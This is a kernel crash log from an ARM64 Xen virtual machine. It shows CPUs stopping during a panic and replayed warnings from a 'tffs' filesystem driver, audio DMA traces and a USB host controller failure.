(DU1) [ 48.131639] [ 50.772167] [<ffffffc0000815bc>] gic_handle_irq+0x6c/0xd0
(DU1) [ 48.131652] [ 50.772180] Exception stack(0xffffffc8b1ef7dd0 to 0xffffffc8b1ef7f00)
(DU1) [ 48.131667] [ 50.772195] 7dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 48.131683] [ 50.772211] 7de0: ffffffc8b1ef7f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 48.131698] [ 50.772226] 7e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ef4000 0000000000000001
(DU1) [ 48.131715] [ 50.772243] 7e20: ffffffc000f5f000 00ffffffffffffff 000000004e87b8f0 0000000b2f42e83f
(DU1) [ 48.131731] [ 50.772259] 7e40: ffffffc8b1ecb100 ffffffc8b1ef7ec0 0000000000000820 000000003ac84e00
(DU1) [ 48.131747] [ 50.772274] 7e60: 0000000000000018 ffffffffab5ac93e 00376ce86d000000 003b9aca00000000
(DU1) [ 48.131763] [ 50.772291] 7e80: ffffffc000122938 0000007f95ddce80 0000000000000230 ffffffc000d4d000
(DU1) [ 48.131877] [ 50.772405] 7ea0: ffffffc000d4d908 0000000000000005 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 48.131894] [ 50.772422] 7ec0: ffffffc000c4cb48 ffffffc8b1ef7f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 48.131912] [ 50.772440] 7ee0: 0000000000000000 ffffffc8b1ef7f30 ffffffc000085a58 ffffffc8b1ef7f30
(DU1) [ 48.131929] [ 50.772457] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 48.131944] [ 50.772472] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 48.131957] [ 50.772485] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 48.131972] [ 50.772500] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 48.131989] [ 50.772517] [<00000000c108192c>] 0xc108192c
(DU1) [ 48.132039] [ 50.772567] CPU1: stopping
(DU1) [ 48.132075] [ 50.772603] CPU: 1 MPIDR: 80000102 PID: 0 Comm: swapper/1 Tainted: P W OE 4.4.36 #1
(DU1) [ 48.132097] [ 50.772624] Hardware name: XENVM-4.8 (DT)
(DU1) [ 48.132110] [ 50.772638] Call trace:
(DU1) [ 48.132133] [ 50.772660] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 48.132152] [ 50.772679] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 48.132172] [ 50.772700] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 48.132190] [ 50.772718] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 48.132207] [ 50.772735] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 48.132223] [ 50.772751] Exception stack(0xffffffc8b1edbdd0 to 0xffffffc8b1edbf00)
(DU1) [ 48.132241] [ 50.772769] bdc0: ffffffc000d4d000 0000008000000000
(DU1) [ 48.132262] [ 50.772790] bde0: ffffffc8b1edbf30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 48.132282] [ 50.772810] be00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ed8000 0000000000000001
(DU1) [ 48.132302] [ 50.772830] be20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34c80bc4
(DU1) [ 48.132323] [ 50.772851] be40: ffffffc8b1ec9600 ffffffc8b1edbec0 0000000000000820 0000000008e08316
(DU1) [ 48.132348] [ 50.772876] be60: 0000000000000018 0000000000000000 0000000000000000 0008e0831688c230
(DU1) [ 48.304895] [ 50.945423] be80: ffffffc000122938 0000007f86033be0 0000000000000170 ffffffc000d4d000
(DU1) [ 48.304922] [ 50.945450] bea0: ffffffc000d4d908 0000000000000001 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 48.304945] [ 50.945473] bec0: ffffffc000c4cb48 ffffffc8b1edbf70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 48.304967] [ 50.945495] bee0: 0000000000000000 ffffffc8b1edbf30 ffffffc000085a58 ffffffc8b1edbf30
(DU1) [ 48.304996] [ 50.945524] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 48.305017] [ 50.945545] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 48.305036] [ 50.945563] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 48.305056] [ 50.945584] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 48.305076] [ 50.945604] [<00000000c108192c>] 0xc108192c
(DU1) [ 48.305095] [ 50.945623] CPU2: stopping
(DU1) [ 48.305121] [ 50.945649] CPU: 2 MPIDR: 80000103 PID: 0 Comm: swapper/2 Tainted: P W OE 4.4.36 #1
(DU1) [ 48.305144] [ 50.945672] Hardware name: XENVM-4.8 (DT)
(DU1) [ 48.305158] [ 50.945686] Call trace:
(DU1) [ 48.305174] [ 50.945702] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 48.305193] [ 50.945721] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 48.305213] [ 50.945741] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 48.305231] [ 50.945759] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 48.305249] [ 50.945777] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 48.305266] [ 50.945794] Exception stack(0xffffffc8b1ee3dd0 to 0xffffffc8b1ee3f00)
(DU1) [ 48.305286] [ 50.945814] 3dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 48.305308] [ 50.945836] 3de0: ffffffc8b1ee3f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 48.305332] [ 50.945860] 3e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ee0000 0000000000000001
(DU1) [ 48.305354] [ 50.945882] 3e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34db7953
(DU1) [ 48.305376] [ 50.945904] 3e40: ffffffc8b1ece700 ffffffc8b1ee3ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 48.508711] [ 51.149239] 3e60: 0000000000000b25 00000000fa83b2da 00376ce86d000000 003b9aca00000000
(DU1) [ 48.508736] [ 51.149264] 3e80: ffffffc000111668 0000007f83891fa0 0000000000000000 ffffffc000d4d000
(DU1) [ 48.508759] [ 51.149287] 3ea0: ffffffc000d4d908 0000000000000002 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 48.508781] [ 51.149309] 3ec0: ffffffc000c4cb48 ffffffc8b1ee3f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 48.508803] [ 51.149331] 3ee0: 0000000000000000 ffffffc8b1ee3f30 ffffffc000085a58 ffffffc8b1ee3f30
(DU1) [ 48.508829] [ 51.149357] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 48.508853] [ 51.149381] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 48.508873] [ 51.149401] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 48.508894] [ 51.149422] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 48.508914] [ 51.149442] [<00000000c108192c>] 0xc108192c
(DU1) [ 48.508933] [ 51.149461] CPU3: stopping
(DU1) [ 48.508963] [ 51.149491] CPU: 3 MPIDR: 80000001 PID: 0 Comm: swapper/3 Tainted: P W OE 4.4.36 #1
(DU1) [ 48.508983] [ 51.149511] Hardware name: XENVM-4.8 (DT)
(DU1) [ 48.508995] [ 51.149523] Call trace:
(DU1) [ 48.509014] [ 51.149542] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 48.509031] [ 51.149559] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 48.509049] [ 51.149577] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 48.509064] [ 51.149592] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 48.509080] [ 51.149608] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 48.509094] [ 51.149622] Exception stack(0xffffffc8b1ee7dd0 to 0xffffffc8b1ee7f00)
(DU1) [ 48.509109] [ 51.149637] 7dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 48.509126] [ 51.149654] 7de0: ffffffc8b1ee7f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 48.509143] [ 51.149671] 7e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ee4000 0000000000000001
(DU1) [ 48.509160] [ 51.149688] 7e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34dab75d
(DU1) [ 48.712778] [ 51.353306] 7e40: ffffffc8b1eca380 ffffffc8b1ee7ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 48.712796] [ 51.353323] 7e60: 0000000000121735 00000000eac0c6e6 00376ce86d000000 003b9aca00000000
(DU1) [ 48.712813] [ 51.353341] 7e80: ffffffc000245568 0000007fabd47c50 0000000000000000 ffffffc000d4d000
(DU1) [ 48.712830] [ 51.353357] 7ea0: ffffffc000d4d908 0000000000000003 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 48.712847] [ 51.353375] 7ec0: ffffffc000c4cb48 ffffffc8b1ee7f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 48.712863] [ 51.353391] 7ee0: 0000000000000000 ffffffc8b1ee7f30 ffffffc000085a58 ffffffc8b1ee7f30
(DU1) [ 48.712883] [ 51.353411] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 48.712901] [ 51.353429] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 48.712916] [ 51.353443] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 48.712932] [ 51.353460] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 48.712948] [ 51.353476] [<00000000c108192c>] 0xc108192c
(DU1) [ 48.712963] [ 51.353491] CPU4: stopping
(DU1) [ 48.712993] [ 51.353521] CPU: 4 MPIDR: 80000002 PID: 0 Comm: swapper/4 Tainted: P W OE 4.4.36 #1
(DU1) [ 48.713013] [ 51.353541] Hardware name: XENVM-4.8 (DT)
(DU1) [ 48.713025] [ 51.353553] Call trace:
(DU1) [ 48.713040] [ 51.353567] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 48.713054] [ 51.353582] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 48.713071] [ 51.353598] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 48.713084] [ 51.353612] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 48.713098] [ 51.353626] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 48.713111] [ 51.353639] Exception stack(0xffffffc8b1ef3dd0 to 0xffffffc8b1ef3f00)
(DU1) [ 48.713126] [ 51.353654] 3dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 48.713142] [ 51.353670] 3de0: ffffffc8b1ef3f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 48.713158] [ 51.353686] 3e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ef0000 0000000000000001
(DU1) [ 48.916795] [ 51.557323] 3e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34dab69d
(DU1) [ 48.916813] [ 51.557341] 3e40: ffffffc8b1ecd980 ffffffc8b1ef3ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 48.916829] [ 51.557356] 3e60: 0000000000060935 00000000dbfbb796 00376ce86d000000 003b9aca00000000
(DU1) [ 48.916846] [ 51.557374] 3e80: ffffffc000245568 0000007f905dfc50 0000007f85ffa654 ffffffc000d4d000
(DU1) [ 48.916862] [ 51.557390] 3ea0: ffffffc000d4d908 0000000000000004 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 48.916877] [ 51.557405] 3ec0: ffffffc000c4cb48 ffffffc8b1ef3f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 48.916893] [ 51.557421] 3ee0: 0000000000000000 ffffffc8b1ef3f30 ffffffc000085a58 ffffffc8b1ef3f30
(DU1) [ 48.916912] [ 51.557440] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 48.916927] [ 51.557455] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 48.916941] [ 51.557468] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 48.916956] [ 51.557484] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 48.916971] [ 51.557499] [<00000000c108192c>] 0xc108192c
HB-SYS: 2015-01-01 - 12:00:53 - 00000004 - cpu: 50% - load: 0.84 - availmem: 1108MB - usermem: 384MB - temp1: 46.0C - temp2: 44.0C - gpu: 248532/1896
(DU1) [ 53.370706] [ 56.011234] SMP: failed to stop secondary CPUs
(DU1) [ 53.370737] [ 56.011265] ==== Show logs : cur [0,0], next [120456,1316], show seq[1-1316] ====
(DU1) [ 53.372068] [ 56.012596] :: <4>[ 18.191262] [ 20.831790] ------------[ cut here ]------------
(DU1) [ 53.372098] [ 56.012626] :: <4>[ 18.191274] [ 20.831801] WARNING: at fs/inode.c:273
(DU1) [ 53.372113] ::
(DU1) [ 53.372121] [ 56.012649] :: <4>[ 18.191441] [ 20.831971] fscrypto(OE)
(DU1) [ 53.372137] [ 56.012665] :: <4>[ 18.191447] [ 20.831975] ---[ end trace 795f05bf7923303e ]---
(DU1) [ 53.372153] [ 56.012681] :: <0>[ 18.191454] [ 20.831982] Call trace:
(DU1) [ 53.372172] [ 56.012700] :: <0>[ 18.191483] [ 20.832011] [<ffffffc000213aa0>] drop_nlink+0x58/0x70
(DU1) [ 53.372189] [ 56.012716] :: <0>[ 18.191524] [ 20.832052] [<ffffffbffc02eb40>] tffs_unlink+0x180/0xfd8 [tffs]
(DU1) [ 53.372206] [ 56.012734] :: <0>[ 18.191564] [ 20.832092] [<ffffffbffc030bdc>] tffs_unlink_vfs+0x2c/0x38 [tffs]
(DU1) [ 53.372227] [ 56.012755] :: <0>[ 18.191586] [ 20.832114] [<ffffffc00020306c>] vfs_unlink+0xcc/0x1c0
(DU1) [ 53.372244] [ 56.012772] :: <0>[ 18.191605] [ 20.832132] [<ffffffc000208550>] do_unlinkat+0x248/0x2a8
(DU1) [ 53.372261] [ 56.012789] :: <0>[ 18.191622] [ 20.832150] [<ffffffc000208db4>] SyS_unlinkat+0x3c/0x70
(DU1) [ 53.372279] [ 56.012807] :: <0>[ 18.191641] [ 20.832169] [<ffffffc00008508c>] __sys_trace_return+0x0/0x4
(DU1) [ 53.372296] [ 56.012824] :: <7>[ 19.186853] [ 21.827410] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372312] [ 56.012840] :: <7>[ 19.200193] [ 21.840779] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372328] [ 56.012856] :: <7>[ 19.206428] [ 21.846989] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372344] [ 56.012872] :: <7>[ 19.211890] [ 21.852449] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372360] [ 56.012888] :: <7>[ 19.220627] [ 21.861188] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372376] [ 56.012904] :: <7>[ 19.228782] [ 21.869343] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372391] [ 56.012919] :: <7>[ 19.236304] [ 21.876862] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372406] [ 56.012934] :: <7>[ 19.249147] [ 21.889707] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372423] [ 56.012951] :: <7>[ 19.264784] [ 21.905345] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372439] [ 56.012967] :: <7>[ 19.273204] [ 21.913763] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.372456] [ 56.012984] :: <7>[ 19.284857] [ 21.925417] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396680] [ 56.037208] :: <7>[ 19.299245] [ 21.939803] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396697] [ 56.037225] :: <7>[ 19.311409] [ 21.951970] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396713] [ 56.037241] :: <7>[ 19.328708] [ 21.969266] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396729] [ 56.037257] :: <7>[ 19.349239] [ 21.989802] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396745] [ 56.037273] :: <7>[ 19.366481] [ 22.007041] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396760] [ 56.037288] :: <7>[ 19.382678] [ 22.023238] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396776] [ 56.037304] :: <7>[ 19.403696] [ 22.044255] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396791] [ 56.037319] :: <7>[ 19.412193] [ 22.052753] ISO 9660 Extensions: RRIP_1991A
(DU1) [ 53.396808] [ 56.037335] :: <6>[ 19.485807] [ 22.126335] Entered exynos_ado_tx_dma_open, ANN2_SDS
(DU1) [ 53.396824] [ 56.037352] :: <6>[ 19.486136] [ 22.126664] Entered exynos_ado_tx_dma_hw_params
(DU1) [ 53.396840] [ 56.037368] :: <6>[ 19.486154] [ 22.126681] EAX:P:DmaAddr=@fc000000 Total=3840 PrdSz=960 #Prds=4 area=0xffffff8000fbb000
(DU1) [ 53.396858] [ 56.037386] :: <6>[ 19.486220] [ 22.126748] Entered exynos_ado_tx_dma_mmap
(DU1) [ 53.396874] [ 56.037402] :: <6>[ 19.486245] [ 22.126773] Entered exynos_ado_tx_dma_prepare, ANN2_SDS
(DU1) [ 53.396890] [ 56.037418] :: <6>[ 19.488021] [ 22.128550] Entered exynos_ado_tx_dma_trigger, ANN2_SDS : cmd = 1
(DU1) [ 53.396910] [ 56.037437] :: <6>[ 19.488038] [ 22.128566] pvaudio_pcm_setup entry
(DU1) [ 53.396924] [ 56.037452] :: <6>[ 19.489489] [ 22.130017] pvaudio_pcm_setup exit (code=0)
(DU1) [ 53.396939] [ 56.037467] :: <6>[ 19.489933] [ 22.130461] enable exynos ado mpx
(DU1) [ 53.396955] [ 56.037483] :: <6>[ 19.503913] [ 22.144441] Entered exynos_ado_tx_dma_trigger, ANN2_SDS : cmd = 0
(DU1) [ 53.396975] [ 56.037503] :: <6>[ 19.503934] [ 22.144462] disable exynos ado mpx
(DU1) [ 53.396990] [ 56.037518] :: <6>[ 19.503947] [ 22.144475] Entered exynos_ado_tx_dma_hw_free, ANN2_SDS
(DU1) [ 53.584623] [ 56.225151] :: <6>[ 19.503954] [ 22.144482] Entered exynos_ado_tx_dma_close, ANN2_SDS, AOX-853
(DU1) [ 53.584641] [ 56.225169] :: <6>[ 19.519096] [ 22.159624] Entered exynos_ado_tx_dma_open, ANN1_NAV
(DU1) [ 53.584658] [ 56.225186] :: <6>[ 19.519530] [ 22.160058] Entered exynos_ado_tx_dma_hw_params
(DU1) [ 53.584674] [ 56.225202] :: <6>[ 19.519547] [ 22.160075] EAX:P:DmaAddr=@fc0a0000 Total=3840 PrdSz=960 #Prds=4 area=0xffffff8001060000
(DU1) [ 53.584695] [ 56.225223] :: <6>[ 19.519625] [ 22.160153] Entered exynos_ado_tx_dma_mmap
(DU1) [ 53.584713] [ 56.225240] :: <6>[ 19.519652] [ 22.160180] Entered exynos_ado_tx_dma_prepare, ANN1_NAV
(DU1) [ 53.584730] [ 56.225258] :: <6>[ 19.521124] [ 22.161652] Entered exynos_ado_tx_dma_trigger, ANN1_NAV : cmd = 1
(DU1) [ 53.584748] [ 56.225276] :: <6>[ 19.521148] [ 22.161676] enable exynos ado mpx
(DU1) [ 53.584767] [ 56.225295] :: <6>[ 19.537324] [ 22.177852] Entered exynos_ado_tx_dma_trigger, ANN1_NAV : cmd = 0
(DU1) [ 53.584785] [ 56.225312] :: <6>[ 19.537348] [ 22.177876] disable exynos ado mpx
(DU1) [ 53.584799] [ 56.225327] :: <6>[ 19.537360] [ 22.177888] Entered exynos_ado_tx_dma_hw_free, ANN1_NAV
(DU1) [ 53.584815] [ 56.225343] :: <6>[ 19.537368] [ 22.177896] Entered exynos_ado_tx_dma_close, ANN1_NAV, AOX-853
(DU1) [ 53.584835] [ 56.225363] :: <4>[ 37.035840] [ 39.676369] ------------[ cut here ]------------
(DU1) [ 53.584850] [ 56.225378] :: <4>[ 37.035861] [ 39.676388] WARNING: at /tmp/build/tuxera_tffs/aops.c:93
(DU1) [ 53.584868] ::
(DU1) [ 53.584877] [ 56.225405] :: <4>[ 37.035972] [ 39.676502] fscrypto(OE)
(DU1) [ 53.584893] [ 56.225421] :: <4>[ 37.035978] [ 39.676506] ---[ end trace 795f05bf7923303f ]---
(DU1) [ 53.584911] [ 56.225439] :: <0>[ 37.035984] [ 39.676512] Call trace:
(DU1) [ 53.584924] [ 56.225452] :: <0>[ 37.036065] [ 39.676593] [<ffffffbffc00dcf8>] tffs_process_delayed_evictions.isra.0+0x208/0x288 [tffs]
(DU1) [ 53.584944] [ 56.225472] :: <0>[ 37.036135] [ 39.676662] [<ffffffbffc00dec0>] tffs_bio_end_io_write+0x148/0x208 [tffs]
(DU1) [ 53.784721] [ 56.425249] :: <0>[ 37.036162] [ 39.676689] [<ffffffc0003e7a34>] bio_endio+0x8c/0xc0
(DU1) [ 53.784739] [ 56.425266] :: <0>[ 37.036183] [ 39.676711] [<ffffffc0003ef8d0>] blk_update_request+0xc0/0x3a8
(DU1) [ 53.784758] [ 56.425286] :: <0>[ 37.036207] [ 39.676735] [<ffffffc0003f9f54>] blk_mq_end_request+0x2c/0x90
(DU1) [ 53.784775] [ 56.425303] :: <0>[ 37.036229] [ 39.676757] [<ffffffc0003fa2a4>] __blk_mq_complete_request+0x12c/0x150
(DU1) [ 53.784793] [ 56.425321] :: <0>[ 37.036251] [ 39.676778] [<ffffffc0003fa300>] blk_mq_complete_request+0x38/0x48
(DU1) [ 53.784812] [ 56.425340] :: <0>[ 37.036275] [ 39.676803] [<ffffffc0005521dc>] blkif_interrupt+0x93c/0xb60
(DU1) [ 53.784829] [ 56.425357] :: <0>[ 37.036295] [ 39.676823] [<ffffffc0000f81b4>] handle_irq_event_percpu+0x8c/0x2b8
(DU1) [ 53.784847] [ 56.425375] :: <0>[ 37.036315] [ 39.676843] [<ffffffc0000f8430>] handle_irq_event+0x50/0x80
(DU1) [ 53.784864] [ 56.425392] :: <0>[ 37.036335] [ 39.676863] [<ffffffc0000fbd30>] handle_edge_irq+0x148/0x1b0
(DU1) [ 53.784881] [ 56.425409] :: <0>[ 37.036353] [ 39.676881] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 53.784899] [ 56.425426] :: <0>[ 37.036377] [ 39.676904] [<ffffffc00049ff28>] __evtchn_fifo_handle_events+0x168/0x1f8
(DU1) [ 53.784917] [ 56.425445] :: <0>[ 37.036397] [ 39.676925] [<ffffffc00049ffdc>] evtchn_fifo_handle_events+0x24/0x30
(DU1) [ 53.784935] [ 56.425462] :: <0>[ 37.036419] [ 39.676946] [<ffffffc00049cb3c>] __xen_evtchn_do_upcall+0xa4/0x128
(DU1) [ 53.784952] [ 56.425480] :: <0>[ 37.036439] [ 39.676967] [<ffffffc00049cbd4>] xen_hvm_evtchn_do_upcall+0x14/0x20
(DU1) [ 53.784970] [ 56.425498] :: <0>[ 37.036462] [ 39.676990] [<ffffffc000097d34>] xen_arm_callback+0x14/0x20
(DU1) [ 53.784988] [ 56.425516] :: <0>[ 37.036481] [ 39.677009] [<ffffffc0000fc558>] handle_percpu_devid_irq+0xb0/0x210
(DU1) [ 53.785007] [ 56.425535] :: <0>[ 37.036502] [ 39.677029] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 53.984846] [ 56.625374] :: <0>[ 37.036522] [ 39.677050] [<ffffffc0000f79a8>] __handle_domain_irq+0xa0/0x120
(DU1) [ 53.984866] [ 56.625394] :: <0>[ 37.036543] [ 39.677071] [<ffffffc0000815bc>] gic_handle_irq+0x6c/0xd0
(DU1) [ 53.984884] [ 56.625412] :: <4>[ 37.036561] [ 39.677089] Exception stack(0xffffffc8a9907380 to 0xffffffc8a99074b0)
(DU1) [ 53.984902] [ 56.625429] :: <4>[ 37.036569] [ 39.677097] 7380: ffffffc03992e108 0000008000000000 ffffffc8a99074e0 ffffffc000407a40
(DU1) [ 53.984920] [ 56.625448] :: <4>[ 37.036576] [ 39.677104] 73a0: 0000000080000145 ffffffc8768de0b8 ffffffc03992e108 ffffffc8a9907538
(DU1) [ 53.984939] [ 56.625467] :: <4>[ 37.036583] [ 39.677111] 73c0: 0000000000000011 ffffffc01a505e00 ffffffc8a9907480 ffffffc8b1810fc0
(DU1) [ 53.984960] [ 56.625487] :: <4>[ 37.036590] [ 39.677118] 73e0: 0000000000000047 0000000000000238 0000000000000000 0000000000000220
(DU1) [ 53.984979] [ 56.625506] :: <4>[ 37.036597] [ 39.677125] 7400: 0000000000000001 ffffffc8768de250 0000000000000040 0000000000000000
(DU1) [ 53.984998] [ 56.625526] :: <4>[ 37.036604] [ 39.677131] 7420: ffffffbffc039ff0 0000000000001000 0000000000000000 ffffffbffc039ff0
(DU1) [ 53.985017] [ 56.625544] :: <4>[ 37.036611] [ 39.677138] 7440: ffffffbffc03a1f0 ffffffc03992e108 0000000000000001 ffffffc03992e108
(DU1) [ 53.985036] [ 56.625564] :: <4>[ 37.036617] [ 39.677145] 7460: 0000000000000001 00000000fffffffb ffffffc8768de0b8 ffffffc8a9907958
(DU1) [ 53.985055] [ 56.625583] :: <4>[ 37.036624] [ 39.677152] 7480: 0000000000020000 ffffffc8768ddcb8 ffffffbdc09f8e40 ffffffc8a99074e0
(DU1) [ 53.985077] [ 56.625605] :: <4>[ 37.036630] [ 39.677158] 74a0: ffffffc0003fc878 ffffffc8a99074e0
(DU1) [ 53.985092] [ 56.625620] :: <0>[ 37.036638] [ 39.677166] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 53.985108] [ 56.625636] :: <0>[ 37.036660] [ 39.677188] [<ffffffc0003ef214>] generic_make_request+0xf4/0x1a0
(DU1) [ 54.180845] [ 56.821373] :: <0>[ 37.036681] [ 39.677209] [<ffffffc0003ef368>] submit_bio+0xa8/0x1f0
(DU1) [ 54.180865] [ 56.821393] :: <0>[ 37.037320] [ 39.677848] [<ffffffbffc00ed54>] tffs_bio_submit+0xac/0xd8 [tffs]
(DU1) [ 54.180883] [ 56.821411] :: <0>[ 37.037385] [ 39.677913] [<ffffffbffc015f1c>] tffs_bio_da_writepage+0x614/0x1188 [tffs]
(DU1) [ 54.180902] [ 56.821430] :: <0>[ 37.037449] [ 39.677977] [<ffffffbffc011450>] tffs_write_cache_pages+0x1a8/0x458 [tffs]
(DU1) [ 54.180921] [ 56.821449] :: <0>[ 37.037508] [ 39.678035] [<ffffffbffc01182c>] tffs_bio_writepages_helper+0x12c/0x3b8 [tffs]
(DU1) [ 54.180941] [ 56.821469] :: <0>[ 37.037568] [ 39.678095] [<ffffffbffc0156b4>] tffs_da_writepages+0x2c/0x40 [tffs]
(DU1) [ 54.180959] [ 56.821487] :: <0>[ 37.037596] [ 39.678124] [<ffffffc0001985a0>] do_writepages+0x40/0x70
(DU1) [ 54.180981] [ 56.821509] :: <0>[ 37.037619] [ 39.678147] [<ffffffc0002295f8>] __writeback_single_inode+0x60/0x4c8
(DU1) [ 54.181003] [ 56.821531] :: <0>[ 37.037641] [ 39.678169] [<ffffffc00022a0b0>] writeback_sb_inodes+0x2a0/0x498
(DU1) [ 54.181021] [ 56.821549] :: <0>[ 37.037664] [ 39.678191] [<ffffffc00022a34c>] __writeback_inodes_wb+0xa4/0xe8
(DU1) [ 54.181039] [ 56.821567] :: <0>[ 37.037685] [ 39.678213] [<ffffffc00022a730>] wb_writeback+0x2e8/0x3a8
(DU1) [ 54.181056] [ 56.821584] :: <0>[ 37.037706] [ 39.678234] [<ffffffc00022aeb0>] wb_workfn+0x100/0x4a8
(DU1) [ 54.181071] [ 56.821599] :: <0>[ 37.037729] [ 39.678257] [<ffffffc0000bafe4>] process_one_work+0x204/0x510
(DU1) [ 54.181089] [ 56.821617] :: <0>[ 37.037773] [ 39.678301] [<ffffffc0000bb41c>] worker_thread+0x12c/0x4b0
(DU1) [ 54.181107] [ 56.821634] :: <0>[ 37.037797] [ 39.678325] [<ffffffc0000c1c7c>] kthread+0xf4/0x108
(DU1) [ 54.181124] [ 56.821652] :: <0>[ 37.037819] [ 39.678347] [<ffffffc000084ff0>] ret_from_fork+0x10/0x20
(DU1) [ 54.181139] [ 56.821667] :: <4>[ 43.647392] [ 46.287920] xhci-hcd xhci-hcd.5.auto: xHCI host not responding to stop endpoint command.
(DU1) [ 54.181160] [ 56.821688] :: <4>[ 43.647403] [ 46.287931] xhci-hcd xhci-hcd.5.auto: Assuming host is dying, halting host.
(DU1) [ 54.369616] [ 57.010144] :: <3>[ 43.667644] [ 46.308172] xhci-hcd xhci-hcd.5.auto: HC died; cleaning up
(DU1) [ 54.369636] [ 57.010163] :: <6>[ 43.667696] [ 46.308224] usb 3-1: USB disconnect, device number 2
(DU1) [ 54.369652] [ 57.010180] :: <6>[ 43.667706] [ 46.308234] usb 3-1.1: USB disconnect, device number 3
